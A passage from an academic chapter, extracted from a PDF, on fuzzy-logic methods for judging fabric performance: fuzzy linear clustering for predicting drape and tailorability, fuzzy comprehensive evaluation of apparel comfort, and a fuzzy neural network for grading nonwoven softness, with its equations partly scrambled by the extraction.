fabric, and there is no fixed model to automatically estimate tailorability from fabric mechanical properties. Typically, tailorability is obtained by laboratory test sewing, a time- and labor-consuming process. The capability to automatically and reliably estimate fabric tailorability would save garment manufacturers time and money in selecting suitable fabrics. What about the usefulness of the ability to estimate the draping property of a fabric? Although drape coefficient data can be obtained for each fabric by using the Cusick drape tester, it is a tedious process. Thus, it would be desirable to have the ability to predict the drape property of a fabric from its other physical properties so that we probably do not have to physically measure the drape coefficients for every fabric. That is why we conducted the prediction experiments with fuzzy linear clustering in this research. The main principle in addressing the prediction problem is to find a reliable prediction method that is tolerant to noisy data, yet is quite efficient in computation time. Moreover, we would prefer a prediction method that is easily interpreted for human understanding. The approach taken in our work is to use fuzzy linear clustering combined with the K-nearest neighbor method for fabric drape and tailorability prediction. The FLC method of Hathaway and Bezdek (1993) is a generalization of the fuzzy C-means of Bezdek (1980). FLC finds fuzzy clusters by iteratively optimizing an objective function. Given a set of sample data points D = {p = : 1 ≤ i i ≤ n} and the desired number of clusters C (≥ 2), the algorithm produces C fuzzy clusters Ak, 1 ≤ k ≤ C, and the membership values μki = μk (p ) for i each point pi and cluster Ak. Here, each given data point p is of the form p = , where xi = is a real-valued vector of dimension s ≥ 1, and yi is a real number. Each fuzzy cluster Ak (1 ≤ k ≤ C) is characterized by a linear function gk (x) = ak0 + ak1x1 + ... + aksxs. The algorithm finds the membership values μki and the coefficients in
2173
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
the linear functions gk (x) such that the objective function Jm is minimized: C
n
J m = ∑∑ k =1 i =1
( ki )
m
[yi − g k ( xi )]2.
(1)
The constraints ∑ ki = 1 (summed over all k) and μki ≥ 0 apply here as well. We call the resulting clusters fuzzy linear clusters because of the linearity of functions gk (x). The computation of the fuzzy linear clusters proceeds from initial randomly generated membership values. The algorithm iteratively computes the linear coefficients by linear regression from the current membership values and then computes the membership values from the current linear coefficients according to the following equation:
ki
⎡( yi − g k ( xi )) 2 ⎤ ⎦ = ⎣ C
∑ ⎡⎣( yi − g j ( xi j =1
−
1 m −1
1 − )) 2 ⎤ m −1
,
(2)
⎦
where 1 ≤ k ≤ C and 1 ≤ i ≤ n. The algorithm terminates when the maximum change of the membership values between consecutive iterations falls below a given threshold.
FLC Plus K-Nearest Neighbor Approach Application of fuzzy linear clustering for data prediction typically involves two steps: the training step and the prediction step. In the training step, we apply the fuzzy linear clustering algorithm (with the number of clusters C specified) to a training data set with n data points. This will produce the cluster centers gk (in the form of linear equations) for 1 ≤ k ≤ C and the fuzzy membership values μki for 1 ≤ k ≤ C and 1 ≤ i ≤ n. The training step will also generate a predicted y value for each training data point . In the prediction step, given only the x part of a data point (x = ), the prediction algorithm will produce an
2174
estimated y part. The y value is computed by the following steps. 1.
2. 3.
First, for the given data x0, find the nearest neighbor of x0 from the training data, and thus use μki, the membership value for < xi, yi > in cluster k as membership values μk0 for x0 for each 1 ≤ k ≤ C. Next, compute gk(x0) for each linear equation gk. Finally, combine the results of all clusters by the following equation: C
y = ∑ g k (x0 ) k =1
ki.
(3)
Our initial experiments have confirmed the viability of FLC for fabric drape coefficient prediction. Subsequently, we develop a hybrid method combining the K-nearest neighbor approach with fuzzy linear clustering for the drape prediction task. The hybrid method differs from the initial method described above only in the prediction step. Instead of using only one nearest neighbor to obtain the membership values of a new data point x0 to the fuzzy clusters, multiple nearest neighbors are used for this purpose. Namely, to estimate the membership value μk0 for x0 in cluster Ak, we find the K-nearest neighbors of x0 from the training data set, and then just set μk0 to be the average of membership values of these K-nearest neighbors to cluster Ak. The rest of the prediction step proceeds in the same way.
Experiments and Results A preliminary result was reported on using FLC for drape prediction from fabric mechanical properties with a relatively small (about 100 points) sample data (J. Chen et al., 2002). The works presented here are based on a larger fabric data set (300+ data points). Here, each data point is of the form , where x = , a vector of dimension 16 corresponding to 16 mechanical properties of a fabric, and y is the fabric’s drape
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
fine tuning, we achieved a prediction accuracy of about 88% on test data. Subsequently, the hybrid method combining K-nearest neighbor with FLC is investigated, which leads to prediction accuracy of about 92%. In the initial prediction study (with single nearest neighbor to estimate fuzzy membership), two experiments were conducted. In one experiment, we observe the prediction accuracies on testing data (disjoint from training data) in connection with various numbers of clusters used in training. We observed that using too many clusters in training is not helpful to reduce prediction error on unseen test data. As can be seen in Table 1, prediction accuracy on testing data initially increases with the increase of the number of clusters,
coefficient. The objective here is to predict a fabric’s drape coefficient value from its mechanical property values. We also experimented on tailorability prediction by FLC with a smaller (about 100 points) data set. After training on fabric drape data, we observed the prediction accuracies of the learned clusters on both training data and on a separate testing (drape) data set. As we expected, the prediction accuracy on training data is quite high (nearly 95% when we use three clusters). Increasing the number of clusters is observed to increase the prediction accuracy on the training data. Experiments on using the learned fuzzy model to predict drape values for unseen test data produce encouraging results. Without any further
Table 1. Prediction accuracy vs. number of clusters (training data size is 200, testing data size is 100) number of clusters prediction accuracy
3
4
5
10
20
30
84.3
86.6
83.1
83.3
81.7
82.2
Table 2. Prediction accuracy vs. size of training data: number of clusters C = 4 training size prediction accuracy
50
100
150
200
250
79.0
82.1
87.3
82.7
83.1
Table 3. Results using hybrid method with K-nearest neighbors: k = 3 and C = 6 training size prediction accuracy
90 91.3
100 91.7
110 92.2
120 92.6
130 92.5
140 91.9
Table 4. Results using hybrid method with K-nearest neighbors: k = 5 and C = 4 training size prediction accuracy
90 90.1
100 90.7
110 91.3
120 91.9
130 91.8
140 91.3
2175
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
but then it starts getting worse. This suggests that using too many clusters for training is likely to overfit the training data, and the clusters obtained actually lose generalization power and thus cause the drop in prediction accuracy. In the other experiment, we tried different sizes for the training and testing data split, and observed the resulting prediction accuracy on testing data. Table 2 shows the prediction accuracy in connection with training data size (we have a total of 300 data points). It is obvious that the prediction accuracy initially improves with the growth of the training data size, but after the training data size reaches 150 (half of the total data), the prediction accuracy deteriorates. Again, here we observe the effect of overfitting. The lesson is that training with too many data points is not necessarily a blessing: The models discovered may not generalize well. An intuitive explanation is that when the training data set is too big, the fuzzy clusters may overfit the data by memorizing the peculiarities of data, and thus they do not give good prediction results on unseen data. We have implemented the hybrid method combining the K-nearest neighbor method with FLC for fabric drape prediction. We find that the hybrid approach improves prediction accuracy further to about 92%. Tables 3 and 4 show the results of two experiments with different values for K and C. In these two experiments, the total data set size is 183 (rather than 300). Again, one can in some sense observe that a bigger training data size may not always produce better performance, and overfitting must be avoided. For tailorability prediction, we performed experiments using a data set of about 100 points. The data came from the tailorability test laboratory at the University of Louisiana at Lafayette, where the fabric tailorability scores were obtained through actual sewing tests of the fabrics. The FLC method is able to produce a prediction accuracy of 92% with a 75-25 split between training data and testing data.
2176
Summary for Fuzzy Clustering for Predicting Fabric Drape and Tailorability Information technology is bringing tremendous opportunities to the textile and garment industry. Our online database and its intelligent search engine provide cloth designers, manufacturers, and retailers with a useful and convenient tool to quickly find suitable fabric materials that best fit their needs. The flexible queries supported by our system enhance the system’s usability. Data mining methods such as fuzzy clustering are applied effectively to discover patterns relating fabric properties. The system can be seen as a first step toward a comprehensive online business exchange system for cloth designers, manufacturers, retailers, and fabric manufacturers. Fuzzy linear clustering appears to be quite effective for predicting fabric appearance from fabric physical properties. The experiments indicate a promising application of the fuzzy approach to the discovery of patterns relating fabric properties. Moreover, the experiments show that we need to guard against overfitting in applying fuzzy linear clustering: Trying to fit the training data with too many clusters or training with too many data points may cause a loss of generalization power. Our study also indicates that the hybrid method combining the K-nearest neighbor method with fuzzy linear clustering produces superior prediction accuracy. Besides further experiments and validations of the fuzzy linear clustering method, we see several ways to extend our works of applying the fuzzy approach to the search engine on the fabric database. These include the application of fuzzy linear clustering to discover new patterns among fabric properties, the use of the fuzzy C-means algorithm for fabric classification and query answering, and the development of hybrid approaches combining fuzzy methods with decision-tree learning to predict fabric appearance and tailorability. In a recent book on fuzzy databases
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
(Galindo, Urrutia, & Piattini, 2006), the fuzzy clustering method has been combined with the fuzzy query language fSQL for an interesting application. We would like to compare our fuzzy clustering and query-answering method with the fSQL approach. We are investigating hybrid methods that combine fuzzy clustering with decision-tree learning for predicting fabric appearance and tailorability. The idea is to first apply the fuzzy C-means algorithm for making numerical valued fabric properties discrete, and then construct a decision tree from the fabric property data. The decision tree can be used for the prediction of fabric appearance or tailorability, which will be incorporated into the search engine.
FUZZY COMPREHENSIVE METHOD FOR EVALUATING APPAREL COMFORT
serviceable lifetime, and consumers’ preference for specific end uses as well, can be considered a comprehensive approach to evaluating textile comfort performance. This approach provides an alternative means to the use of measurements from instrumental ones and makes it possible to assess objectively fabric comfort behavior. Here, we will first introduce the mathematical principles of fuzzy comprehensive evaluation by introducing four evaluation models and discussing the selection of the models. Then, we discuss the analytical procedure and the evaluation results of three types of female ready-to-wear casual summer clothing (blouse, slacks, and underpants) based on the variations of their physical properties in various abrasion times and the relative importance of physical-comfort-related factors (weight, thickness, bending length, and air permeability) by questionnaires answered by female university students.
Mathematical Principles Textile comfort performance had long been considered impossible to describe quantitatively until a new approach, the fuzzy comprehensive evaluation technique, was proposed (Rong & Slater, 1992). It has become a very popular and widely used fuzzy mathematical technique applied in a variety of areas. For example, it is applied as a new approach to the evaluation of fabric hand and performance in textile engineering (Raheel & Liu, 1991). The technique was also applied to the objective evaluation of fabric softness (Y. Chen et al., 2000). Statistical methods of ANOVA (analysis of variance) and factor analysis were suggested to determine the fuzzy factor subset A~ from the fabric mechanical property data measured with the KES-FB instruments. Although it is difficult to define fabric comfort performance accurately, the fuzzy comprehensive evaluation technique introduced here, which takes into account the measured values of relevant mechanical or physical attributes of the material and the durability (the changes of these measured values) within its
Fuzzy comprehensive evaluation is a type of converting operations among different fuzzy sets. A general form B~ = A~ * R~ is used to express a process that converses the fuzzy factor subset (vector) A~ into fuzzy grade subset (vector) B~ through a fuzzy relation R~. It has become a very popular and widely used fuzzy mathematical technique applied in a variety of areas, for example, in the evaluation of fabric hand and performance in textile engineering (Raheel & Liu, 1991). Given a certain computational model of the A~ * R~, or a specific conversion relation R~ (i.e., membership function), one can get different mathematical evaluation models, each having a different essence and therefore dramatically different grading results. Hence, both the essence of each fuzzy comprehensive evaluation model and the determination of the fuzzy membership function have to be understood thoroughly so as to accurately apply these models.
2177
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
Essence of Fuzzy Comprehensive Evaluation Models For the fuzzy comprehensive evaluation operator B~ = A~ * R~, the current models are below (Rong & Slater, 1992; Wang, 1984): I . Model (∧, ∨ ) : II . Model (• , ∨ ) : III . Model (• , ⊕) : IV . Model (∧, ⊕) :
⎫ ⎪ ⎪ b j = ∨ im=1 a i rij ⎪ m ⎪ ⎬ b j = min{1, ∑ a i rij } ⎪ i =1 ⎪ m b j = min{1, ∑ min{a i , rij }}⎪⎪ i =1 ⎭
b j = ∨ im=1 (a i ∧ rij )
(4) in which ai is a member of A∼ with i = 1, …, m. For Model I, Model (∧, ∨), the operator is b j = ∨ im=1 (a i ∧ rij ),
(5)
where ∧ and ∨ denote minimum (min) and maximum (max) operations respectively, namely, b j = max[min(a1 , r1 j ), min(a 2 , r2 j ),
In this model, the grade of membership r ij of a single element vi to a corresponding evaluation grade uj is amended as
(7)
This clearly indicates that ai is the upper limit of r ij (j=1, 2, ⋅⋅⋅, n) in considering multielement evaluation; namely, the grade of memberships of element vi to any evolution grade uj (j = 1, 2, ⋅⋅⋅, n) is restricted to be less than ai. Obviously, _ in the operator accounts only for the most important ∗ element (of maximum rij) in regard to every evaluation grade uj while neglecting the contributions of all other elements. This is a kind of major element-dominating evaluation. Hence, this model
2178
b j = ∨ im=1 a i rij;
(8)
namely, b j = max[(a1 , r1 j ), (a 2 , r2 j ),
, (a m , rmj )].
(9)
The difference between Model (·, ∨) and Model (∧, ∨) is that rij∗ = a ij ∧ rij is replaced by rij∗ = a i rij. rij is amended by being multiplied by a less-than-1 factor, ai, instead of restricted by an upper limit. Although the contributions of every element are taken into account, A~ is by no means a weighting factor vector and it is not necessary that ai = 1 ( i =1, 2, ⋅⋅⋅, m). For Model III, Model (·,⊕), the operator is b j = (a1rij ) ⊕ (a 2 r2 j )⊕,
, ⊕(a m rmj ),
(10)
, min(a m , rmj )]
(6)
rij∗ = a i ∗ rij = a i ∧ rij = min(a i , rij )
is only suitable when there are not many elements (m is small). It is noteworthy that A~ should not be manipulated for weight distribution among elements, and we should let Σai = 1 (i = 1, 2, ⋅⋅⋅, m) since, in this way, the small weight value ai will mask the contributions of various elements. For Model II, Model (·, ∨), the operator is
where the symbol ⊕ denotes the bounded sum, defined as ⊕ = min(1, + ). In this model, bj is calculated as the sum of all rij∗ = a i rij instead of the maximum as in Model (·, ∧,). In this way, it takes into account the contributions of all elements vi (i = 1, 2, ⋅⋅⋅, m). The entries of the factor set A~ = a1 , a 2 , , a m are a weighting factor and its sum obeys ∑ a i = 1 ( i = 1, 2, , m).Since∑ a i rij (i = 1, 2, , m) the operator becomes b j = (a1r1 j ) + (a 2 r2 j ) +,
, +(a m rmj ),
(11)
where ∑ a i = 1 (i = 1, 2, , m). In this case, the model can also be denoted as Model (·, +). For Model IV, Model (∧, ⊕), the operator is b j = (a i ∧ r1 j ) ⊕ (a 2 ∧ r2 j )⊕,
, ⊕(a m ∧ rmj ). (12)
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
Similar to Model (∧, ∨), this model restricts ∗ the upper limit of rij to be ai, namely, rij = a i rij However, it calculates the bi as the bounded ∗ sum of all rij. This model accounts for the contributions of all elements, but does not follow ∑ a i = 1 (i = 1, 2, , m).
Selection of Fuzzy Comprehensive Evaluation Models Different people in different situations may have their different views of evaluating a set of objects. Sometimes, only the major element is important, that is, major-element dominant, whereas sometimes the conditions of the total elements are important regardless of the value of the major element. The above models can somehow reflect these different views of object evaluation. For one object under a same A~ and R~, evaluation grade sets from the above models obey the following theorem (Y. Y. Chen, Liu, & Wang, 1983): B(∧, ⊕) ≥ B(⋅, ⊕) ≥ B(⋅, ∨ ) ⎫ ⎬. B(∧, ⊕) ≥ B(∧, ∨ ) ≥ B(⋅, ∨ ) ⎭
(13)
This can be proven by comparing their operators, that is, ∀ a,b ∈ 1, a·b ≤ a∧b ≤ a⇔b ≤ a⊕b. Therefore, Model (·, ∨) and Model (∧, ⊕) account more for the contributions of nonmajor elements than Model (∧, ∨) while still allowing for the dominant effect of the major element. Hence, Model (·, ∨) and Model (∧, ⊕) are advisable to use when Model (∧, ∨) fails or more accounts of nonmajor elements need to be taken. Model (·, ⊕) is sort of a weighted average model, accounting for the contributions of all elements according to their weights, and is, therefore, more suitable to the cases where whole sets of elements are interesting. In practical use, the relative comparison of the entry values of an evaluation grade subset, B~, is more meaningful rather than their absolute values. To compare or evaluate a set of objects, one can first calculate B~ using Model (∧, ∨) and
Model (·, ⊕), and then calculate B~ using either Model (·, ∨) or Model (∧, ⊕). According to the above theorem (Equation 13), if the values of B(∧, ∨) and B(·, ⊕) are rather small, Model (·, ⊕) is more advisable, otherwise, Model (·, ∨). For a same set of objects, different evaluation results could be obtained using different models. This is comparative to the fact that different conclusions may be drawn for the quality order of a set of objects when they are viewed from different angles. To comprehend the results from different models, a second-stage comprehensive evaluation can be carried out using Model (·, ∨). The multistage evaluation can also allow one to analyze complex systems with different facts of objective measures (Rong & Slater, 1992).
Analytical Procedure and Results The performance of textiles depends not only on their initial properties but also, more importantly, on how they behave in service. Here, we illustrate the analytical procedure for and results of how the fuzzy comprehensive evaluation models are applied to the objective evaluation of textile performance based upon initial properties in conjunction with serviceability and durability, as well as end users’ preferences. The analyses are based on two sets of experimental data: the changes occurring during different stages of incremental abrasion testing and a survey of consumer comfort preferences. The first experimental data set contains the variations of thickness, weight per unit area, softness, and stiffness. They produce changes in the bending length and air permeability of plain and twill cotton, plain and twill wool, plain silk, and plain polyester and fiber or cotton (65/35) blended fabrics, which were subjected to various abrasion times of 0, 2, 3, 4, 5, 6, 7, and 8 minutes in an accelerator. The second data set contains the relative importance of physical-comfort-related factors (weight, thickness, bending length, and air permeability) of three types of female ready-towear casual summer clothing (blouse, slacks, and
2179
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
underpants) recorded in questionnaires answered by female university students. In addition, multistage evaluation can be used to allow one to analyze a situation where there are different degrees of facets of an objective set of measures while avoiding the difficulties of determining the grade of membership of fuzzy subsets, A~—a step that would be too complicated by the presence of many different components or effects in each element to evaluate an article (a fabric, say). The grade of membership, μ(x), of thickness, weight, and bending length are calculated according to the formula below: ( x) =
xi +1 − x d
xi < x ≤ xi +1 (i = 1, 2,..., 6)
(14) where x represents some measure of the property under consideration. Conversely, since the increased air permeability is considered desirable whereas a decrease in other properties is advantageous, the formula for the membership function of air permeability is ( x) =
x − xi +1 d
xi +1 < x ≤ xi
(i = 1, 2,..., 6)
(15)
In all cases, the property is divided into six grades, and d, the difference between successive grade intervals, is equal to (xmax - xmin)/5, where xmax and xmin are the maximum and minimum values of each property item, respectively. The grades of membership of each property in different abrasion stages can be calculated for each fabric. Using Model III, that is, Model ( •, ⊕):
b j = min{1,
m
∑ a i rij }, i =1
the evaluation result for the initial property of a plain cotton fabric used for a blouse is B~ = (0.10, 0.15, 0.22, 0.04, 0.15, 0.35).
2180
Similarly, results for this fabric are different levels of abrasion for different end uses as well as the corresponding results for other fabrics. If an evaluation result expressed in a single number is desired, it can usually be obtained by means of a weighted-average calculation, for example: m
= ∑ b kj j =1
m
j
/ ∑ b kj,
(16)
j =1
where αj is the individual value of α (just as μj is the value of μ for each term in Equation 14 above) ranging from 1 to 6. The power component k can be determined for each specific case, though it is normally suggested that k should be set at 2. Assuming the importance of all properties at each of the eight abrasion times is equal and Model III is used, the second-stage evaluation can be simply carried out. The final single-value results of fuzzy comprehensive evaluation for all fabrics in three end uses are derived, as listed in Table 5 (Rong & Slater, 1992). By comparing the final results, we can see that plain wool is preferred to twill wool fabric for blouses, slacks, and underpants since the former has a higher comprehensive-evaluation value than the latter; the same is true for plain and twill cotton fabrics. Silk is the best among these six results for the three end uses since it has the highest evaluation.
Summary for Fuzzy Comprehensive Method for Evaluating Apparel Comfort The fuzzy comprehensive evaluation technique is demonstrated as a new way of dealing with textile comfort and performance, the two widely accepted phenomena, which, because they are complicated by being vague and affected by many attributes, are usually assessed subjectively. It can be seen from the procedure and the results that it is possible to establish a procedure for the assessment and selection of a fabric for a specific end use, with account taken of the consumer’s preference together with considerations of durability.
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
Table 5. Single output of fuzzy comprehensive evaluation for three fabric end uses Fabric Type Plain cotton Twill cotton Plain wool Twill wool Plain silk Plain polyester/cotton
Blouse 3.42 1.56 4.14 2.96 5.04 3.74
Although the results in this example may not be universally representative, of course, because of the limited availability of experimental data, they are still able to illustrate how the technique can provide useful information to textile and clothing manufacturers. Once the process is established, it should be possible to develop an intelligent database system for comprehensively evaluating textile fabric comfort and performance.
FUZZY NEURAL NETWORK FOR GRADING FABRIC SOFTNESS Application Scenario In the manufacture of fabric materials, soft hand is always a critical priority to satisfy customers. Even denim manufacturers are pursuing the soft touch of jeans by improving weaving and finishing so as to creating a denim lifestyle: casual and comfortable (Rudie, 1996). Nonwoven fabrics, particularly spunbond and air-blown nonwovens, are more like papery sheeting materials because of their specific structure, randomly laid and bonded fiber web that is distinct from the yarn-interlacing structure of woven fabrics. Therefore, the nonwoven fabrics usually lack fabric soft hand. The improvement of softness for spunbond nonwoven fabrics becomes strategically important in many end-use applications. Many approaches have been proposed for improving nonwoven softness, including the use of chemical softeners, enzymatic
Slacks 3.54 1.46 4.14 2.80 5.19 3.68
Underpants 3.42 1.58 4.14 3.00 5.01 3.77
treatment (mainly for natural fiber nonwovens), and molecular modifications. A question raised by nonwoven manufacturers is how to objectively evaluate the improvement of nonwoven softness after use of new raw materials, adjustment of processing parameters, or application of new finishing methods. This means that we need to develop an instrumental method that is able to sensitively detect any incremental progress of fabric softness. Previous research with this aim was primarily focused on tissue and paper towel products. An example was the use of a mechanical stylus scanning method to measure the surface property of tissues (Rust, Keadle, Allen, & Barker, 1994). This research proposed a frequency index obtained through the fast Fourier transform (FFT) to describe tactile sensitivity. Other researchers (Kim, Shalev, & Barker, 1994) studied the softness property of paper towels using the KES-FB instruments. They developed a linear regression model to predict the so-called softness intensity. Both of the above research relies on human subjective input in grading the softness of tissue or paper towel products. Objective hand measurements of nonwoven fabrics were investigated in Japan (Kawabata, Niwa, & Wang, 1994). This research applied the same technique that Professor Kawabata and his coworkers developed for evaluating the hand of wool and wool-rich suiting fabrics. Recently, a neural network technique was used for the online prediction of tissue softness (Sarimveis & Retsina, 2001). An inferential sensor operated in real time
2181
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
together with a distributed control system. An application of the neural network technique for predicting fabric end uses was also reported (Y. Chen, Zhao, & Collier, 2001). In this case study, an objective method of fuzzy neural networks for evaluating nonwoven softness is exhibited. The purpose of this study is to investigate a practical approach to grading
the softness of nonwoven fabrics based on nonwoven mechanical properties instead of human hand judgment. Spunbond polypropylene nonwovens are targeted in this study because of their diverse end uses ranging from personal care to home interior. The research method involves two techniques: the KES-FB instruments and neural network computing. The KES-FB instruments are
Kawabata Parameter Bending Hysteresis 2HB (gf⋅cm2/cm) Compressive Linearity Compressive Energy (gf⋅cm/cm2) Compressive Resilience (%) Maximum Compressive Rate (%) Mean Frictional Coefficient Mean Deviation of Mean Frictional Coefficient Mean Surface Roughness (micron)
Input Code X9 X10 X11 X12 X13 X14 X15 X16
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
a de facto method for measuring fabric mechanical properties in academia and industries. The neural network computing technique is among the most promising approaches to solving real-life fuzzy problems because of its power in pattern recognition, particularly in learning highly nonlinear complexity.
Approach Fabric mechanical properties deal with these basic mechanical deformations: extension, shear, bending, and compression. Fabric softness or hand is believed to be a complex behavior of these mechanical properties, plus surface friction and roughness (Hearle, 1993a, 1993b). The KES-FB instruments are ideal for measuring fabric basic mechanical properties and can provide 16 instrumental parameters (Table 6). A computerized data acquisition system recently developed at Louisiana State University is used to record and calculate the KES-FB data automatically (Y. Chen, Zhao, & Turner, 2001). According to industry’s input, two types of polypropylene spunbond nonwovens were tar-
geted. One (Target 2) had the best soft hand with a desired input value of 1, and the other (Target 1) had the worst softness with a desired input value of 0. From each of these targeted nonwoven fabrics, 15 specimens were prepared and tested using the KES-FB instruments. To establish a neural network model for predicting the nonwoven softness, obtained KES-FB data were imported to the commercial software NeuroSolutions™ (Version 4 for PCs) for training (Principe, Euliano, & Lefebvre, 2000). This software features MS Excel compatibility and can easily run on a PC desktop with Excel-format data input. This software provides a fuzzy logic neuronetwork model CANFIS to enhance computer learning performance (Jang, Sun, & Mizutani, 1997). With integrated fuzzy rules (membership functions) as a preprocessor, the neural network can characterize inputs that are not very discrete and establish an efficient model quickly. Figure 5 illustrates the structure of this neuro-fuzzy network. The CANFIS model includes two types of fuzzy membership functions, the bell-shaped curve and the Gaussian-shaped curve. The number of membership functions assigned to each
Figure 6. Neural network learning curve 1.0 0.9
Training MSE Cross Validation MSE
0.8 0.7 0.6 0.5 0.4 0.3 0.2 0.1 0.0 1
40
79
118 157
196 235 274 ch
313
352 391
2183
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
Table 7. Softness grades by neural network model
Sample ID
Target 1
Softness Index
0
#1.1 0.55
Group 1 #1.2 #1.3 0.72 0.28
network input can also be selected (usually 2 to 4 for small- or medium-sized data sets). Fuzzy models applied in the CANFIS model are the Tsukamoto and Sugeno fuzzy models. Regarding these models, we can refer to Jang et al. for more details. The configuration for the CANFIS model needs to specify the number of network hidden layers, the type of membership function, the number of the membership function per input, and the type of fuzzy model. In this case study, two hidden layers, the Bell membership function and the Tsukamoto model, were used. Six experimental spunbond nonwovens were selected and measured using the KES-FB instruments to form a test data set. These spunbond nonwovens were divided into two groups, Group 1 (four samples) and Group 3 (two samples), each representing a type of modified polypropylene. The softness of these six samples was graded by the established neural network model. These softness grades, with numerical values between 0 and 1, were defined as the softness index.
Results and Discussion The fuzzy logic neural network model was established by training the training data set (Target 1 and Target 2). Figure 6 is a learning curve for this model. To assess the performance of the established network model, mean square error (MSE) was calculated (Principe et al., 2000). MSE is defined as P
MSE =
2184
N
∑∑ (dij − yij )2 , j =0 i =0
NP
(17)
#1.4 0.52
Group 3 #3.1 #3.2 1.00 0.98
Target 2 1
where P is the number of output processing elements, N is the number of exemplars (sample points) in the data set; yij is a network output for exemplar i at processing element j, and dij is the desired output for exemplar i at processing element j. In the present study, the final MSE value is 0.0027 for the training and 0.0096 for crossvalidation. This means that the trained model is highly accurate. Table 7 lists the grading results for the six tested samples. According to these softness indexes, it can be understood that the softness of the nonwoven samples in Group 1 is similar to that of Target 1 because of a lower softness index value varying between 0.28 and 0.72. In contrast, the nonwoven samples in Group 3 (3.1 and 3.2) have a very similar softness index to that of Target 2. As a result, the softness index can be used for softness interpretation and comparison among different spunbond nonwoven fabrics because of the availability of the numerical grading values for fabric softness. This will bring the convenience of communications between manufacturers and consumers. For a graphical interpretation of the softness difference among the spunbond nonwoven samples in Group 1 and Group 3, with reference to Target 1 and Target 2, discriminant analysis can be used (SAS Institute Inc., 1990). The canonical discriminant function is defined as CAN = u1 x1 + u2 x2 +
+ u16 x16,
(18)
where CAN is a discriminant score, ui is a canonical coefficient (discriminant weight), and xi is a
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
Figure 7. Fabric softness difference interpreted by discriminant analysis
Figure 8. Fabric softness difference interpreted by first two discriminant functions
KES-FB instrumental variable. The canonical coefficient vector u = (u1, u2, …, u16) can be obtained by solving the following matrix equation (Lindeman, Merenda, & Gold, 1980):
B = (bkl )16×16,
−1
( W B − I )u = 0.
(19)
-1
W is an inverse matrix of a pooled withingroup matrix of sums of squares and cross-products, calculated by W=
where bkl =
4
∑ n j ( xkj − xk )( xlj − xl ). j =1
I is an identity matrix. λ is called an eigenvalue of the matrix W-1B and can be determined by the following characteristic equation: W −1B − I = 0.
∑ S( j )
(21)
(22)
j
(j = 1, 2, …, 4, presenting jth group),
(20)
where S (j ) = (Sklj )16×16 and
Sklj =
nj
∑ ( xkij − xkj )( xlij − xlj ) i =1
(k, l = 1, 2,, 16; nj = number of samples in Group j). B is the between-group matrix of sums of squares and cross-products expressed as
The number of eigenvalues is equal to the number of groups minus 1 (here 4-1 = 3). Substi-1 tuting each λ in the matrix W B - λI allows the -1 determination of each adjoint matrix of W B - λI. -1 Any column in an adjoint matrix of W B – λI is an eigenvector u in terms of an eigenvalue λ. In the case of using the discriminant analysis for classifying four nonwoven fabric groups discussed here, three canonical discriminant functions (CAN1, CAN2, and CAN3) are obtained. Using these three sets of CAN as a coordinating system, the four nonwoven fabric groups can be plotted in this three-dimensional space (Figure 7). Because the cumulative proportion of the ei-
2185
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
genvalues for the discriminant functions CAN1 and CAN2 reaches 96.39%, the projects of the four nonwoven groups on the CAN1-CAN2 plane are particularly examined (Figure 8). It can be seen that Group 3 is located between +CAN1 and +CAN2 and the softness index of the samples in Group 3 is closer to that represented by Target 2. On the contrary, Group 1 is located between –CAN1 and –CAN2 and the softness of the samples in this group more resembles that represented by Target 1.
Summary for Fuzzy Neural Network for Grading Fabric Softness Two types of experimental spunbond nonwovens were selected to represent two softness extremes: one with best softness and the other with worst softness. The mechanical properties of these nonwovens in terms of extension, shear, bending, compression, and surface friction and roughness were measured using the KES-FB instruments. Obtained KES-FB data helped fingerprint the softness of these two extreme nonwoven samples. A softness grading model was established by using fuzzy neural network computing. This model graded the softness of a group of six spunbond nonwovens made from commercial polypropylene with numerical values between 0 (indicating the worst softness) and 1 (indicating the best softness). These numerical grading values could then be used as a softness index for spunbond nonwoven fabrics in communications among manufacturers and customers. The model cross-validation indicated that the estimate for the model MSE was as low as 0.0096. The multivariate method of discriminant analysis could be used to provide a graphical interpretation for the nonwoven softness index. The established model in this study was demonstrational because of a limited number of exemplars (sample points) in the training data set. Another disadvantage of the present procedure is
2186
that the neuron-fuzzy program was stand alone and not accessible through the Internet. Further research is needed to expand the present fabric database to include various types of nonwoven fabrics and to incorporate the neuron-fuzzy computing procedure in the Web-based database structure. This will enable manufacturers or end users to execute the fabric softness evaluation by logging onto the fabric database Web site.
CONCLUSION AND FURTHER WORK In this chapter, we have exhibited a fabric database and three different approaches of fuzzy computing techniques for applications in evaluating fabric end-use properties regarding drape, tailorability, comfort, and softness. Quantitative assessment for these quality aspects of fabric end uses is still more art than science in today’s textile production and consuming. The presented research cases help explore the ability of database computing and fuzzy logic computing technology to solve those fabric performance grading problems that are continuously challenging the textile community. In the application for predicting fabric drape and tailorability, the established online database and its intelligent search engine provided a useful tool for textile end users to quickly find quality fabrics that would meet specific product requirements. The flexible queries supported by the database system enhanced the system’s search efficiency. The method of fuzzy linear clustering was feasible for predicting fabric drape based on measured mechanical properties. The experiment indicated that trying to fit the training data with too many clusters or training with too many data points might cause a loss of generalization power. Therefore, we need to guard against overfitting when using fuzzy linear clustering. Our study also indicated that the hybrid method combining
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
